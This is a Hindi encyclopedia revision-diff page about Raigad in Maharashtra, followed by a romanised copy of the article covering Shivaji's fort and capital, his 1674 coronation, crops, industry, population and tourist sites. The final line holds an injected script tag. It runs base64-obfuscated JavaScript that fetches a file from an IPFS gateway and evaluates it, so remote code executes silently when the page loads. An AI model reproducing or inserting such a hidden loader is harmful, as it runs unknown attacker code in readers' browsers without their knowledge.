Difference between revisions of "रायगढ़ महाराष्ट्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 10: Line 10:
 
तटवर्ती कगार बरसाती नदी-घाटियों द्वारा विभक्त हैं, जो इस इलाक़े की अधिकांश कृषि में सहायक हैं। चावल और नारियल यहाँ की प्रमुख फ़सलें हैं और मछली पकड़ना और नमक बनाना महत्वपूर्ण समुद्रतटीय उद्यम हैं।
 
तटवर्ती कगार बरसाती नदी-घाटियों द्वारा विभक्त हैं, जो इस इलाक़े की अधिकांश कृषि में सहायक हैं। चावल और नारियल यहाँ की प्रमुख फ़सलें हैं और मछली पकड़ना और नमक बनाना महत्वपूर्ण समुद्रतटीय उद्यम हैं।
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
 +
[[चित्र:Shivaji-Statue.jpg|thumb|[[छत्रपति शिवाजी]] की प्रतिमा, रायगढ़]]
 
तीसरी शताब्दी ई. पू. के आरम्भ से ही कोंकण तट के रायगढ़ क्षेत्र का [[रोम]] के साथ व्यापार स्थापित हो गया था। काग़ज़ की लुगदी, रसायन और इंजीनियरिंग का काम यहाँ के प्रमुख उद्योग हैं। खोपोली और पनवल प्रमुख औद्योगिक केन्द्र हैं।
 
तीसरी शताब्दी ई. पू. के आरम्भ से ही कोंकण तट के रायगढ़ क्षेत्र का [[रोम]] के साथ व्यापार स्थापित हो गया था। काग़ज़ की लुगदी, रसायन और इंजीनियरिंग का काम यहाँ के प्रमुख उद्योग हैं। खोपोली और पनवल प्रमुख औद्योगिक केन्द्र हैं।
 
==जनसंख्या==
 
==जनसंख्या==
 
20वीं शताब्दी के उत्तरार्द्ध में यहाँ की एक बड़ी जनसंख्या बंबई (मुंबई) प्रवास कर गई और इस इलाक़े के उत्तरी भाग का तेज़ी से औद्योगिक विकास हुआ। अलीबाग़ यहाँ का प्रमुख शहर है। रायगढ़ ज़िला की कुल जनसंख्या (2001) 22,05,972 है।
 
20वीं शताब्दी के उत्तरार्द्ध में यहाँ की एक बड़ी जनसंख्या बंबई (मुंबई) प्रवास कर गई और इस इलाक़े के उत्तरी भाग का तेज़ी से औद्योगिक विकास हुआ। अलीबाग़ यहाँ का प्रमुख शहर है। रायगढ़ ज़िला की कुल जनसंख्या (2001) 22,05,972 है।
 
==पर्यटन==
 
==पर्यटन==
[[चित्र:Shivaji-Statue.jpg|thumb|[[छत्रपति शिवाजी]] की प्रतिमा, रायगढ़]]
 
 
यहाँ के पाल, कुडा, कोन्नन और अंबीवली में अनेक प्राचीन बौद्ध गुफ़ा मन्दिर और [[ऐलिफ़ेंटा द्वीप]] में [[शैव गुफ़ाएँ]] हैं। विख्यात सैरगाह और रायगढ़ (राजा का दुर्ग) का क़िला यहाँ स्थित हैं।
 
यहाँ के पाल, कुडा, कोन्नन और अंबीवली में अनेक प्राचीन बौद्ध गुफ़ा मन्दिर और [[ऐलिफ़ेंटा द्वीप]] में [[शैव गुफ़ाएँ]] हैं। विख्यात सैरगाह और रायगढ़ (राजा का दुर्ग) का क़िला यहाँ स्थित हैं।
 
 
==समाधि==
 
==समाधि==
 
शिवाजी की समाधि भी रायगढ़ में ही है।
 
शिवाजी की समाधि भी रायगढ़ में ही है।
 
+
==सम्बंधित लिंक==
 +
{{महाराष्ट्र के पर्यटन स्थल}}
 +
[[Category:महाराष्ट्र]]
 
[[Category:महाराष्ट्र के ऐतिहासिक नगर]][[Category:महाराष्ट्र के ऐतिहासिक स्थान]][[Category:महाराष्ट्र के पर्यटन स्थल]] [[Category:भारत के नगर]][[Category:महाराष्ट्र के नगर]] [[Category:पर्यटन कोश]]__INDEX__
 
[[Category:महाराष्ट्र के ऐतिहासिक नगर]][[Category:महाराष्ट्र के ऐतिहासिक स्थान]][[Category:महाराष्ट्र के पर्यटन स्थल]] [[Category:भारत के नगर]][[Category:महाराष्ट्र के नगर]] [[Category:पर्यटन कोश]]__INDEX__

Revision as of 14:31, 12 September 2010

rayagadh pashchimi bharat ka aitihasik kshetr hai. yah muanbee (bhootapoorv banbee) ke thik dakshin mean maharashtr mean sthit hai. yah koankan samudratatiy maidan ka hissa hai, isaka kshetr laharadar aur a di-tirachhi paha diyoan vala hai, jo pashchimi ghat (poorv) ki sahyadri paha diyoan ki kh di dhalua kagaroan se arab sagar (pashchim) ke ooanche kinaroan tak pahuanchata hai.

itihas

[[chitr:Fort-Raigarh-Maharashtra.jpg|thumb|rayagadh qila, maharashtr]] 1662 ee. mean shivaji tatha bijapur ke sultan mean kafi sangharsh ke pashchat sandhi huee thi jisase shivaji ne apana jita hua sara pradesh prapt kar liya tha. is sandhi ke lie shivaji ke pita kee varsh pashchat putr se milane ae the. shivaji ne unhean apana jita hua samast praant dikhaya. us samay shahaji ke sujhav ko manakar rairi paha di ke ull shrriang par shivaji ne rayagadh ko basane ka irada kiya tha. samadhi bhi rayagadh mean hi hai. yahaan unhoanne ek qila tatha prasad banavaya aur ve yahian nivas karane lage. is prakar shivaji ke rajy ki rajadhani rayagadh mean hi sthapit huee. rayagadh charoan or se sahyadri ki anek parvat malaoan se ghira hua tha aur usake ull shrriang door se dikhaee dete the. mahakavi bhooshan ne rayagadh ke vishay mean likha hai - 'dachchhin ke sab dugg jiti dugg sahar vilas siv sevak siv gadh pati kiyo rayagadh vas, tanh nrip rajadhani kari, jiti sakal turakan, siv saraja ruchi dan mean, kinhoan sujas jahan'. shivaraj bhooshan mean chhand 15 se chhand 24 tak rayagadh ke vaibhav-vilas ka vistrit varnan hai. chhand 15 ('vari patal so machi mahi amaravati ki chhabi oopar chhajean) se yah bhi jnat hota hai ki rayagadh ke durg ki pani se bhari huee ek bahut gahari khaee bhi thi.

rajyabhishek

shivaji ka rajyabhishek rayagadh mean, 6 joon, 1674 ee. ko hua tha. kashi ke prasiddh vidvan gangabhatt is samaroh ke achary the. uparant 1689-90 ee. mean aurangazeb ne is par adhikar kar liya.

krishi aur khanij

tatavarti kagar barasati nadi-ghatiyoan dvara vibhakt haian, jo is ilaqe ki adhikaansh krishi mean sahayak haian. chaval aur nariyal yahaan ki pramukh fasalean haian aur machhali pak dana aur namak banana mahatvapoorn samudratatiy udyam haian.

udyog aur vyapar

[[chitr:Shivaji-Statue.jpg|thumb|chhatrapati shivaji ki pratima, rayagadh]] tisari shatabdi ee. poo. ke arambh se hi koankan tat ke rayagadh kshetr ka rom ke sath vyapar sthapit ho gaya tha. kagaz ki lugadi, rasayan aur ianjiniyariang ka kam yahaan ke pramukh udyog haian. khopoli aur panaval pramukh audyogik kendr haian.

janasankhya

20vian shatabdi ke uttararddh mean yahaan ki ek b di janasankhya banbee (muanbee) pravas kar gee aur is ilaqe ke uttari bhag ka tezi se audyogik vikas hua. alibag yahaan ka pramukh shahar hai. rayagadh zila ki kul janasankhya (2001) 22,05,972 hai.

paryatan

yahaan ke pal, kuda, konnan aur aanbivali mean anek prachin bauddh gufa mandir aur ailifeanta dvip mean shaiv gufaean haian. vikhyat sairagah aur rayagadh (raja ka durg) ka qila yahaan sthit haian.

samadhi

shivaji ki samadhi bhi rayagadh mean hi hai.

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>